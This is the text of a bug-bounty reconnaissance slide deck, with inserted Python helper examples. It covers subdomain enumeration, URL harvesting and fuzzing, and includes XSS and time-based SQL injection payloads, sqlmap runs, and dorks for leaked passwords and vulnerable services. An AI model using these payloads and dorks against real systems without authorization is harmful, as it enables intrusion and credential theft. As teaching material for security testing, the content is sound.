Recon Resurgence: Level up your Recon skills
for Maximum impact in Bug-Bounty
WHOAMI?
Security Analyst at Mithra Consulting
Pursuing MBBS
Part-time Bug bounty hunter
CyberSecurity Trainer & Mentor
Agnibha Dutta
Y0gi
eJPT Certified
Successfully Hacked and Secured:
Sony
Acronis
NASA + 20 other companies
https://twitter.com/AnonY0gi
https://www.youtube.com/@y0gisec
https://www.linkedin.com/in/y0gi/
WHAT IS RECONNAISSANCE?
Reconnaissance, also known as Recon, is one of the most important phases of
penetration testing.
Recon widens the attack surface, which may yield more vulnerabilities, but the ultimate
goal is to dig deep into the target.
Recon = Increase in Attack surface = More vulnerabilities
Recon = Finding untouched endpoints = Less duplicates
Recon = Sharpening your axe before attack
SUBDOMAIN ENUMERATION
Subdomain enumeration is the process of finding subdomains
for one or more domains.
Tools used:
Visual Recon: VirusTotal, subdomainfinder.c99.nl
https://crt.sh/?q=%25.target.com
https://securitytrails.com/list/apex_domain/target.com
https://www.shodan.io/search?query=ssl.cert.subject.cn%3A%22target.com%22
Amass
Dnsx
Subfinder
Chaos
AssetFinder
SUBDOMAIN ENUMERATION
amass enum -passive -norecursive -noalts -df domains.txt -o subs-list.txt
dnsx -silent -d $domain -w ~/wordlist.txt -o ~/dnsbrute.txt
cat domain.txt | dnsgen - | massdns -r ~/resolvers.txt -o S -w alive.txt
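As an added example (not code from the slides), here is a Python parser for the JSON that the crt.sh query above returns when you append &output=json. It does the cleanup a practitioner otherwise does by hand: splits the newline-separated name_value SANs, strips wildcards, lowercases, drops domains that merely share the certificate (including look-alikes such as nottarget.com), and dedupes. The sample JSON is constructed and target.com is a placeholder; fetch_crtsh is the live, network-dependent variant.

```python
import json
import urllib.request

# Constructed sample of what https://crt.sh/?q=%25.target.com&output=json returns
# (real entries carry more fields; only common_name and name_value are used here).
SAMPLE_CRTSH_JSON = json.dumps([
    {"common_name": "www.target.com",
     "name_value": "www.target.com\ntarget.com"},
    {"common_name": "*.dev.target.com",
     "name_value": "*.dev.target.com\nAPI.dev.target.com"},
    {"common_name": "mail.target.com",
     "name_value": "mail.target.com\nautodiscover.target.com\ncdn.example-cdn.net"},
    {"common_name": "www.target.com",               # same cert, logged again after renewal
     "name_value": "www.target.com"},
    {"common_name": "nottarget.com",                # suffix look-alike, out of scope
     "name_value": "nottarget.com\nwww.nottarget.com"},
])


def in_scope(name: str, apex: str) -> bool:
    """True for the apex itself or a real subdomain of it; 'nottarget.com' is not."""
    return name == apex or name.endswith("." + apex)


def parse_crtsh(json_text: str, apex: str) -> list[str]:
    """Reduce a crt.sh JSON response to a sorted, deduplicated list of in-scope hosts.

    name_value holds every SAN on the certificate, newline-separated; SANs can be
    wildcards, mixed case, or domains that merely share the certificate."""
    apex = apex.lower()
    found = set()
    for entry in json.loads(json_text):
        names = [entry.get("common_name", "")] + entry.get("name_value", "").split("\n")
        for name in names:
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]          # keep the wildcard's base for later brute forcing
            if name and in_scope(name, apex):
                found.add(name)
    return sorted(found)


def fetch_crtsh(apex: str, timeout: int = 30) -> list[str]:
    """Live lookup (needs network): the %25.target.com query from the slide, as JSON."""
    url = f"https://crt.sh/?q=%25.{apex}&output=json"
    req = urllib.request.Request(url, headers={"User-Agent": "recon-example/1.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_crtsh(resp.read().decode("utf-8", "replace"), apex)


if __name__ == "__main__":
    for host in parse_crtsh(SAMPLE_CRTSH_JSON, "target.com"):
        print(host)
```

The output is one host per line, so it can be fed straight into dnsx or httpx like the subs-list.txt from amass; the wildcard base (dev.target.com) is kept on purpose so it ends up in the brute-force step.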
FILTERING THE SUBDOMAINS WITH HTTPX
httpx -l domain.txt -timeout 13 -o domain-probe.txt
PORT SCANNING
naabu -list sub-list.txt -top-ports 1000 -exclude-ports 80,443,21,22,25 -o ports.txt
naabu -list sub-list.txt -p - -exclude-ports 80,443,21,22,25 -o ports.txt
cat domain-subs.txt | aquatone -ports xlarge -scan-timeout 300 -out aquatone.txt
HEDnsExtractor -target 20.216.181.67 -only-domains -silent | httpx -title -tech-detect -status-code -silent
SUBDOMAIN OF SUBDOMAIN ENUMERATION
One of the things people rarely search for.
Tools used:
Subbrute: https://github.com/TheRook/subbrute
altdns: https://github.com/infosec-au/altdns
Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt
FINDING LOGIN PANEL FROM URLS
Extract login panels from a list of URLs for further testing.
Tools used:
https://github.com/Mr-Robert0/Logsensor
BROADENING YOUR SCOPE
More targets lead to more options, which ultimately lead to more opportunities.
Crunchbase
bgp.he.net
tools.whoisxmlapi.com
https://whois.arin.net
WHAT TO DO AFTER ENUMERATION? | Collecting URLs
Waybackurls: https://github.com/tomnomnom/waybackurls
Gau: https://github.com/lc/gau
for i in $(cat domain-subs.txt); do gau $i | grep -vE '\.(woff|woff2|ttf|otf|eot|webp|gif|tiff|bmp|wav|png|jpg|jpeg|svg|ico|css|mp4|m4v)' | httpx -silent -fc 404 | tee -a domain-archive.txt; done
https://web.archive.org/cdx/search/cdx?url=*.target.com&fl=original&collapse=urlkey
After collecting URLs, fetch each one with curl and grep the responses
for the following strings:
drive.google
docs.google
/spreadsheets/d/
/document/d/
TIPS AND TRICKS
By Aditya_Shende
cat domains.txt | katana -silent | while read url; do cu=$(curl -s "$url" | grep -E '(drive\.google|docs\.google|/spreadsheets/d/|/document/d/)'); echo -e "==> $url\n$cu"; done
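As an added example (not from the slides or from Aditya_Shende), the two steps above in Python: the static-extension filter the gau pipeline applies before probing, and the grep for shared Google Drive/Docs links, which here also pulls out the document id from the /d/<id> form so findings can be deduplicated per document rather than per link. SAMPLE_URLS and SAMPLE_BODY are constructed inputs; target.com is a placeholder.

```python
import re
from typing import Optional

# Extensions the gau pipeline on the slide strips before probing with httpx.
STATIC_EXT = ("woff", "woff2", "ttf", "otf", "eot", "webp", "gif", "tiff", "bmp",
              "wav", "png", "jpg", "jpeg", "svg", "ico", "css", "mp4", "m4v")
STATIC_RE = re.compile(r"\.(" + "|".join(STATIC_EXT) + r")(?=[?#]|$)", re.IGNORECASE)

# Google Drive / Docs / Sheets links, and the file id inside the /d/<id> form.
DOC_LINK_RE = re.compile(r"""https?://(?:drive|docs)\.google\.com/[^\s"'<>)]+""")
DOC_ID_RE = re.compile(r"/(?:spreadsheets|document|presentation|file)/d/([A-Za-z0-9_-]+)")

# Constructed input: a gau-style URL list and one fetched page body.
SAMPLE_URLS = [
    "https://target.com/static/app.css",
    "https://target.com/api/v1/users?id=1",
    "https://target.com/img/logo.PNG",
    "https://target.com/download?file=report.pdf",
    "https://target.com/api/v1/users?id=1",        # duplicate from a second source
    "https://target.com/fonts/a.woff2?v=3",
    "https://target.com/cssless",                  # not an asset, despite the substring
]
SAMPLE_BODY = """
<html><body>
<a href="https://docs.google.com/spreadsheets/d/1AbC_dEf-123/edit#gid=0">Q3 numbers</a>
<script>var cfg = {"manual": "https://drive.google.com/file/d/0B9xyz/view?usp=sharing"};</script>
<a href="https://drive.google.com/open?id=legacyID">old share</a>
<a href="https://docs.google.com/spreadsheets/d/1AbC_dEf-123/edit#gid=0">same sheet again</a>
</body></html>
"""


def is_static_asset(url: str) -> bool:
    """True when the path ends in a static-asset extension (query/fragment may follow it)."""
    return bool(STATIC_RE.search(url))


def filter_urls(urls) -> list[str]:
    """Drop static assets and duplicates, keeping first-seen order for the httpx probe."""
    seen, kept = set(), []
    for url in urls:
        url = url.strip()
        if url and not is_static_asset(url) and url not in seen:
            seen.add(url)
            kept.append(url)
    return kept


def find_shared_docs(body: str) -> list[tuple[str, Optional[str]]]:
    """Return (link, file_id) for each distinct Google Drive/Docs link in a response body;
    file_id is None for the legacy open?id= form."""
    results, seen = [], set()
    for match in DOC_LINK_RE.finditer(body):
        link = match.group(0)
        if link in seen:
            continue
        seen.add(link)
        id_match = DOC_ID_RE.search(link)
        results.append((link, id_match.group(1) if id_match else None))
    return results


if __name__ == "__main__":
    for url in filter_urls(SAMPLE_URLS):
        print("probe:", url)
    for link, file_id in find_shared_docs(SAMPLE_BODY):
        print("doc:", link, "id:", file_id)
```

A link that turns up here is only a lead: open it unauthenticated and confirm it actually exposes data before reporting, since the same link may be an intentionally public document (see the closing slide).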
TIPS AND TRICKS
Alien Vault OTX (otx.alienvault.com)
Collect Endpoints : https://github.com/xnl-h4ck3r/waymore
Common Crawl (index.commoncrawl.org)
URLScan (urlscan.io)
Using paramspider, gxss to detect Cross-site Scripting (XSS)
cat params | qsreplace yogi | dalfox pipe --mining-dom --deep-domxss --mining-dict --remote-payloads=portswigger,payloadbox --remote-wordlists=burp,assetnote -o xssoutput.txt
cat alive.txt | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | tee xssBug3.txt
TIPS AND TRICKS
Using SQLidetector to search for sqli
Tool Link: https://github.com/eslam3kl/SQLiDetector
https://github.com/xforcered/SQLRecon
TIPS AND TRICKS
SQLi Time Based Tips
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w '%{time_total} %{url_effective}\n'
Any URL that takes about 10 seconds longer than it does without the payload deserves a manual look; a slow host alone is not proof.
Header Based SqLi: https://github.com/SAPT01/HBSQLI
subfinder -dL domains.txt | dnsx | waybackurls | uro | grep "?" | head -20 | httpx -silent > urls; sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
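The parallel/curl one-liner above prints raw timings with nothing to compare them against, so a slow endpoint looks exactly like a sleeping one. As an added example (not from the slides), this Python version keeps the slide's MySQL SLEEP payload but measures a harmless baseline on the same URL, takes the median of several runs, and flags only a consistent gap close to the sleep length. The fetch function is a parameter so the logic can be run offline against a fake; timed_get is the real network variant. target.com is a placeholder.

```python
import sys
import time
import urllib.parse
import urllib.request
from statistics import median

SLEEP_SECONDS = 10
# The MySQL payload from the slide; SLEEP() only fires if the value lands in a query.
SLEEP_PAYLOAD = f"1 AND (SELECT 5230 FROM (SELECT(SLEEP({SLEEP_SECONDS})))SUmc)"
BASELINE_VALUE = "1"


def qs_replace(url: str, value: str) -> str:
    """Replace the value of every query parameter, the way qsreplace does."""
    parts = urllib.parse.urlsplit(url)
    params = urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
    new_query = urllib.parse.urlencode([(key, value) for key, _ in params])
    return urllib.parse.urlunsplit(parts._replace(query=new_query))


def timed_get(url: str, timeout: float = SLEEP_SECONDS * 3) -> float:
    """Wall-clock seconds for one GET, like curl -w '%{time_total}' on the slide."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except Exception:          # a 5xx or a timeout is still a valid timing sample
        pass
    return time.monotonic() - start


def check_time_based(url: str, fetch=timed_get, repeats: int = 3,
                     sleep_seconds: float = SLEEP_SECONDS):
    """Median timing of the SLEEP payload versus a harmless baseline on the same URL.

    A slow host or a flaky network inflates both sides equally, so only the
    difference is judged; None means the URL has no parameters to inject."""
    if "=" not in urllib.parse.urlsplit(url).query:
        return None
    baseline = median(fetch(qs_replace(url, BASELINE_VALUE)) for _ in range(repeats))
    injected = median(fetch(qs_replace(url, SLEEP_PAYLOAD)) for _ in range(repeats))
    delta = injected - baseline
    return {
        "url": url,
        "baseline_s": round(baseline, 2),
        "injected_s": round(injected, 2),
        "delta_s": round(delta, 2),
        "vulnerable": delta >= 0.8 * sleep_seconds,   # tolerate some jitter on the sleep
    }


if __name__ == "__main__":
    # Usage: cat urls.txt | grep "=" | python3 timesqli.py
    for line in sys.stdin:
        result = check_time_based(line.strip())
        if result:
            print(result)
```

Note that SLEEP() is MySQL syntax; for other backends swap the payload (for example pg_sleep() on PostgreSQL or WAITFOR DELAY on MSSQL) and keep the same baseline comparison. Every parameter is replaced at once, so a hit still needs narrowing down to the injectable one before it goes into a report.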
SHODAN FOR RECON
Shodan: https://www.shodan.io/
Shodan dorks:
ssl:"target.com" 200 http.title:"dashboard" --- unauthenticated dashboards
org:"target.com" x-jenkins 200 --- unauthenticated Jenkins servers
ssl:"target.com" 200 proftpd port:21 (or org:"target.com" proftpd port:21) --- ProFTPD on port 21
http.html:zabbix --- Zabbix main and admin portals, authentication bypass (CVE-2022-24255)
org:"target.com" http.title:"phpmyadmin" --- phpMyAdmin
ssl:"target.com" http.title:"BIG-IP" --- F5 BIG-IP, check for CVE-2020-5902
Use Shodan together with FOFA, and match what you find against known exploits.
CENSYS, ZOOMEYE
Censys: https://www.censys.io/
Zoomeye: https://www.zoomeye.org/
Tip: http.favicon.hash:xxxxxxxxxx
FUZZING FOR SENSITIVE FILES & DIRECTORIES
ffuf: https://github.com/ffuf/ffuf
FFUF-ing RECON: a writeup on ffuf
for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done
Tip: fuzz for /wp-content/debug.log; it sometimes contains SQL errors that can be chained into further attacks.
/.git/config
/docker-compose.yml
/wp-admin/admin-ajax.php?action=<text>
/wp-json/wp/v2/users/
/wp-content/plugins/contact-form-7/readme.txt
/https://:80?@evil
/common/config.php.new
ADD THESE IN YOUR FUZZING LIST
y0gi.hacklido.com
y0gi.hacklido.com/y0gi.zip, hacklido.zip, admin.zip, backup.zip
y0gi.hacklido.com/y0gi/y0gi.zip, hacklido.zip, admin.zip, backup.zip
y0gi.hacklido.com/hacklido/y0gi.zip, hacklido.zip, admin.zip, backup.zip
y0gi.hacklido.com/admin/y0gi.zip, hacklido.zip, admin.zip, backup.zip
FINDING SOURCE/BACKUP FILES
Tool: https://github.com/musana/fuzzuli
Credit: GodfatherOrwa
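The list above is one instance of a pattern: the hostname's own labels become archive names and directories. As an added example (not from the slides, and not the fuzzuli tool itself), this generator produces the same 16 paths for y0gi.hacklido.com from any host, strips a leading www, and lets you pass further extensions, which are this example's addition rather than part of the slide's list. The output is one path per line, ready for ffuf.

```python
import sys


def name_words(host: str) -> list[str]:
    """Hostname labels minus a leading www and the TLD: y0gi.hacklido.com -> ['y0gi', 'hacklido'].
    These are the words an admin is most likely to have used for a backup archive."""
    labels = [label for label in host.lower().split(".") if label]
    if labels and labels[0] == "www":
        labels = labels[1:]
    return labels[:-1] if len(labels) > 1 else labels


def backup_candidates(host: str, extensions=("zip",)) -> list[str]:
    """Paths to fuzz, in the layout the slide uses: every word as a filename, at the
    web root and under each word's own directory plus /admin/. Extra extensions
    (tar.gz, sql, bak, ...) are the caller's addition, not part of the slide's list."""
    words = name_words(host)
    filenames = list(dict.fromkeys(words + ["admin", "backup"]))   # ordered, deduped
    directories = list(dict.fromkeys([""] + words + ["admin"]))
    paths = []
    for directory in directories:
        for name in filenames:
            for ext in extensions:
                paths.append(f"{directory}/{name}.{ext}" if directory else f"{name}.{ext}")
    return paths


if __name__ == "__main__":
    # Usage: python3 backups.py y0gi.hacklido.com > list.txt
    #        ffuf -u https://y0gi.hacklido.com/FUZZ -w list.txt -mc 200
    host = sys.argv[1] if len(sys.argv) > 1 else "y0gi.hacklido.com"
    for path in backup_candidates(host):
        print(path)
```

Match on status 200 only and check the Content-Length and Content-Type of any hit: a framework that answers every path with a 200 HTML page will otherwise light up the whole list.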
Trivial Tricks:
Find Sensitive Data in Cloud storage:
site:s3.amazonaws.com "target[.]com"
site:blob.core.windows.net "target[.]com"
site:googleapis.com "target[.]com"
site:drive.google.com "target[.]com"
Github Leaks for AWS, Jira, Okta, etc:
org:"target" pwd/pass/passwd/password
"target.atlassian" pwd/pass/passwd/password
"target.okta" pwd/pass/passwd/password
"Jira.target" pwd/pass/passwd/password
Also search Google Groups and GitLab.
GOOGLE & GITHUB DORKING
Grep all URLs from wayback or gau.
Collect all JS files (".js").
Filter JS files: httpx -content-type | grep 'application/javascript'
Perform Nuclei scan "nuclei -t /root/nuclei-templates/exposures/"
JAVASCRIPT[JS] FILES RECON
Js Recon Tip:
Collect all endpoints from Js files & Create a wordlist from those.
Craft a POST request with any parameter.
Use that request to fuzz for sensitive directory.
Tools:
JSFScan, JS Miner (Burp extension), TruffleHog
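As an added example (not from the slides or any of the tools named above), here is the first two steps of that tip in Python: pull quoted URLs and root-relative paths out of a JS bundle, drop static assets, and expand the paths into the directory wordlist the POST fuzzing step needs. SAMPLE_JS is a constructed bundle and target.com a placeholder; the regex is deliberately narrow (quoted strings that start with / or //host) so it produces fewer junk words than a generic URL matcher.

```python
import re
import sys
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for a bundled front-end file; not taken from any real target.
SAMPLE_JS = r"""
const API = "/api/v2";
const routes = {
  users: API + "/users",
  export: '/admin/export?format=csv',
  legacy: "https://legacy.target.com/v1/orders",
  docs: "//cdn.target.com/assets/docs.json",
};
fetch(`/api/v2/session`).then(r => r.json());
axios.post("/api/v2/users/" + id + "/reset", body);
// "/static/logo.png" is an asset and "./relative" never starts with a slash
const img = "/static/logo.png";
const key = "AKIAIOSFODNN7EXAMPLE";
"""

QUOTE = "[\"'`]"
# Either an absolute/protocol-relative URL or a root-relative path, inside one kind of quote.
ENDPOINT_RE = re.compile(
    QUOTE
    + r"((?:https?:)?//[a-z0-9.-]+\.[a-z]{2,}(?:/[^\"'`\s]*)?|/[a-zA-Z0-9_./?=&%-]+)"
    + QUOTE
)
STATIC_RE = re.compile(r"\.(png|jpe?g|gif|svg|ico|css|woff2?|ttf|eot)(\?.*)?$", re.IGNORECASE)


def extract_endpoints(js_text: str) -> list[str]:
    """Quoted URLs and root-relative paths from JS source, in order, without assets or repeats."""
    found: list[str] = []
    for match in ENDPOINT_RE.finditer(js_text):
        endpoint = match.group(1)
        if STATIC_RE.search(endpoint) or endpoint in found:
            continue
        found.append(endpoint)
    return found


def path_wordlist(endpoints, base: str = "https://target.com") -> list[str]:
    """Every directory prefix of every endpoint path, so /api/v2/users becomes
    api, api/v2 and api/v2/users: the wordlist for the POST fuzzing step on the slide."""
    words: list[str] = []
    for endpoint in endpoints:
        path = urlsplit(urljoin(base, endpoint)).path.strip("/")
        parts = path.split("/")
        for depth in range(1, len(parts) + 1):
            word = "/".join(parts[:depth])
            if word and word not in words:
                words.append(word)
    return words


if __name__ == "__main__":
    # Usage: python3 jsendpoints.py bundle.js > words.txt
    #        ffuf -u https://target.com/FUZZ -w words.txt -X POST -d 'a=1' -mc 200,401,403
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JS
    for word in path_wordlist(extract_endpoints(source)):
        print(word)
```

Endpoints on other hosts (legacy.target.com, cdn.target.com in the sample) are worth keeping separately as new subdomains for the enumeration step; only their paths go into the wordlist here. Fuzzing with a POST body, as the slide suggests, is what separates endpoints that exist but reject GET (405, 401) from ones that are simply absent.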
JAVASCRIPT[JS] FILES RECON
Using Bambdas for JS analysis:
One-liner: echo targetdomain[.]com | gau | grep '\.js' | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
Verify the data
Some exposed data is intentional; that is not a bug.
Report it anyway and it comes back as Invalid.
Don't get angry; you may lose your standing with a good program.
Yes, some programs do accept third-party issues.
Your crafting and exploitation are what count; push the impact as high as you can.
Be humble with the program.
The money isn't going anywhere; don't message the team constantly.
QNA SESSION
https://twitter.com/AnonY0gi
https://www.youtube.com/@y0gisec
https://www.linkedin.com/in/y0gi/
THANK YOU

A Call to Action for Generative AI in 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

Recon for Bug Bounty by Agnibha Dutta.pdf

  • 7. SUBDOMAIN OF SUBDOMAIN ENUMERATION
  One of the rarer things people search for: hosts two or more levels below the apex (for example dev.api.target.com). Passive sources and single-level brute force both tend to miss them, so generate permutations of the names you already have and resolve those.
  Tools used:
  Subbrute: https://github.com/TheRook/subbrute
  altdns: https://github.com/infosec-au/altdns
  Usage (permute the known subdomains with a wordlist, resolve the results, save the ones that resolve):
  ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt
  • 8. FINDING LOGIN PANELS FROM URLS
  Extract the login panels from a list of URLs for further testing (default credentials, username enumeration, missing rate limiting, injection in the login form).
  Tools used: https://github.com/Mr-Robert0/Logsensor
  • 9. BROADENING YOUR SCOPE
  More targets lead to more options, which ultimately lead to more opportunities. Read the program's scope rules before testing what you find here: an acquisition or a sibling company is often owned by the target but still out of scope on paper.
  Crunchbase (acquisitions and subsidiaries)
  bgp.he.net (ASNs and IP ranges announced by the organisation)
  tools.whoisxmlapi.com (reverse WHOIS on registrant e-mail or organisation name)
  https://whois.arin.net (IP allocations registered to the organisation)
  • 10. WHAT TO DO AFTER ENUMERATION? | Collecting URLs
  Waybackurls: https://github.com/tomnomnom/waybackurls
  Gau: https://github.com/lc/gau
  Pull archived URLs for every subdomain, drop static assets, and keep only what still answers (httpx -fc 404 filters out 404s; soft 404s that return 200 still get through, so eyeball the list):
  for i in $(cat domain-subs.txt); do gau $i | grep -vE "\.(woff|woff2|ttf|otf|eot|webp|gif|tiff|bmp|wav|png|jpg|jpeg|svg|ico|css|mp4|m4v)(\?|$)" | httpx -silent -fc 404 | tee -a domain-archive.txt; done
  The same data straight from the Wayback Machine CDX API, one line per unique URL:
  https://web.archive.org/cdx/search/cdx?url=*.target.com&fl=original&collapse=urlkey
  • 11. TIPS AND TRICKS (by Aditya_Shende)
  After collecting URLs, curl the response of each URL and grep for links to shared Google documents:
  drive.google
  docs.google
  /spreadsheets/d/
  /document/d/
  cat domains.txt | katana -silent | while read url; do cu=$(curl -s "$url" | grep -E '(drive\.google|docs\.google|/spreadsheets/d/|/document/d/)'); echo -e "==> $url\n$cu"; done
  Only a document that opens without a login ("anyone with the link") is a finding; one that asks you to sign in is working as intended.
  • 12. TIPS AND TRICKS
  More URL sources beyond the Wayback Machine:
  Alien Vault OTX (otx.alienvault.com)
  Common Crawl (index.commoncrawl.org)
  URLScan (urlscan.io)
  Collect endpoints from all of them in one run: https://github.com/xnl-h4ck3r/waymore
  • 13. TIPS AND TRICKS
  Using paramspider and gxss to detect cross-site scripting (XSS). "params" is the parameterised URL list ParamSpider produced:
  cat params | qsreplace yogi | dalfox pipe --mining-dom --deep-domxss --mining-dict --remote-payloads=portswigger,payloadbox --remote-wordlists=burp,assetnote -o xssoutput.txt
  cat alive.txt | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | tee xssBug3.txt
  Using SQLiDetector to search for SQLi: https://github.com/eslam3kl/SQLiDetector
  • 14. TIPS AND TRICKS
  https://github.com/xforcered/SQLRecon
  Time-based SQLi tips. Put the sleep payload into every query parameter, then time each request; print the URL next to the time, otherwise the output cannot be matched back:
  cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
  cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w '%{time_total} %{url_effective}\n'
  Anything that takes about 10 seconds longer than the untouched URL deserves a second look. Time the untouched URL as well: a host that is already slow under 50 parallel requests produces false positives on its own, and SLEEP() is MySQL syntax (PostgreSQL needs pg_sleep, MSSQL WAITFOR DELAY).
  Header-based SQLi: https://github.com/SAPT01/HBSQLI
  subfinder -dL domains.txt | dnsx | waybackurls | uro | grep "?" | head -20 | httpx -silent > urls; sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
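  The time-based check above, as an added example (not code from the slides): inject_payload does what qsreplace does in the one-liner, parse_curl_timings reads the "%{time_total} %{url_effective}" lines that curl -w writes, and looks_time_based compares medians instead of trusting one slow response. The curl output lines and the shop.example.com URLs are constructed for the example.

```python
import statistics
from urllib.parse import urlsplit, urlunsplit

# Added example (not from the slides): the time-based SQLi test on slide 14 as
# checkable functions. Sample URLs and curl timings below are constructed.

SLEEP_SECONDS = 10
# The slide's MySQL payload; SUmc is just a subquery alias. Other engines need
# their own delay primitive (pg_sleep, WAITFOR DELAY, DBMS_LOCK.SLEEP).
TIME_PAYLOAD = f"1 AND (SELECT 5230 FROM (SELECT(SLEEP({SLEEP_SECONDS})))SUmc)"


def inject_payload(url: str, payload: str) -> str:
    """Replace every query-string value with payload (qsreplace behaviour).
    The payload is inserted raw, not percent-encoded, so the server-side
    parser receives the SQL text unchanged."""
    parts = urlsplit(url)
    if not parts.query:
        return url
    keys = [item.split("=", 1)[0] for item in parts.query.split("&") if item]
    return urlunsplit(parts._replace(query="&".join(f"{k}={payload}" for k in keys)))


def parse_curl_timings(text: str) -> dict[str, list[float]]:
    """Group `time_total url` lines by URL; several samples per URL are expected."""
    timings: dict[str, list[float]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        seconds, url = line.split(maxsplit=1)
        timings.setdefault(url, []).append(float(seconds))
    return timings


def looks_time_based(baseline: list[float], injected: list[float],
                     sleep_seconds: float = SLEEP_SECONDS, tolerance: float = 0.8) -> bool:
    """True when the injected requests are consistently about sleep_seconds
    slower than the untouched URL. Medians make a single slow response (load,
    CDN warm-up, 50 parallel curls) insufficient on its own."""
    if not baseline or not injected:
        return False
    return statistics.median(injected) - statistics.median(baseline) >= tolerance * sleep_seconds


# Constructed curl output: three samples of the clean URL, three of the injected one.
SAMPLE_CURL_OUTPUT = """\
0.41 https://shop.example.com/item?id=1
0.39 https://shop.example.com/item?id=1
0.44 https://shop.example.com/item?id=1
10.52 https://shop.example.com/item?id=1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)
10.47 https://shop.example.com/item?id=1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)
10.61 https://shop.example.com/item?id=1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)
"""


def find_delayed(curl_output: str, payload: str = TIME_PAYLOAD) -> list[str]:
    """Clean URLs whose injected variant was consistently delayed."""
    timings = parse_curl_timings(curl_output)
    hits = []
    for url, samples in timings.items():
        if payload in url:
            continue  # this line is an injected variant, not a baseline
        injected_url = inject_payload(url, payload)
        if looks_time_based(samples, timings.get(injected_url, [])):
            hits.append(url)
    return hits


if __name__ == "__main__":
    # Real use: run curl on both clean and injected URLs, a few times each,
    # with -w '%{time_total} %{url_effective}\n', and feed the output here.
    print(find_delayed(SAMPLE_CURL_OUTPUT))
```

  Three samples per URL is the minimum that makes the median meaningful; collect more on a noisy host, and rerun with SLEEP(0) to confirm the delay disappears before reporting.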
  • 15. SHODAN FOR RECON
  Shodan: https://www.shodan.io/
  Shodan dorks:
  ssl:"target.com" 200 http.title:"dashboard" --- unauthenticated dashboards
  org:"target.com" x-jenkins 200 --- unauthenticated Jenkins servers
  ssl:"target.com" 200 proftpd port:21 --- ProFTPD on port 21
  org:"target.com" http.html:zabbix --- Zabbix; CVE-2022-24255 (main and admin portals: authentication bypass)
  org:"target.com" http.title:"phpmyadmin" --- phpMyAdmin
  ssl:"target.com" http.title:"BIG-IP" --- F5 BIG-IP; check for CVE-2020-5902
  Use Shodan in combination with Fofa, and only run an exploit where the program's rules allow it.
  • 16. CENSYS, ZOOMEYE
  Censys: https://www.censys.io/
  Zoomeye: https://www.zoomeye.org/
  Tip: http.favicon.hash:xxxxxxxxxx (Shodan) pivots from a known favicon to every host that serves the same icon, which surfaces staging copies and forgotten instances on bare IPs that carry no target hostname.
  • 17. FUZZING FOR SENSITIVE FILES & DIRECTORIES
  ffuf: https://github.com/ffuf/ffuf
  Writeup: FFUF-ing RECON
  for i in $(cat host.txt); do ffuf -u "$i/FUZZ" -w wordlist.txt -mc 200,302,401 -se; done
  Add -ac (auto-calibration) on hosts that answer 200 for everything, otherwise the soft 404s drown the real hits.
